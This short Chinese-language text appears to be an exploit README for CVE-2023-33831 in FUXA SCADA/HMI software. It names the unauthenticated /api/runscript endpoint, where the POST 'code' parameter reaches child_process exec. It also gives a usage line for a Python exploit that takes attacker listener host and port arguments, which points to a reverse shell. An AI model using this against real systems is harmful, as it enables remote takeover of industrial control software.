
影响 FUXA 基于 Web 的过程可视化(SCADA/HMI/Dashboard)软件的 CVE-2023-33831 的描述与利用。
该漏洞影响 FUXA 的脚本组件,原因是对用户可控输入缺乏控制或清理,从而允许使用可被扩展用于远程代码执行的危险方法。 受影响的路由是 /api/runscript,在该路由中,无需身份验证即可通过 POST 方法的 code 参数,利用 child_process 模块的 exec 函数执行命令。
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>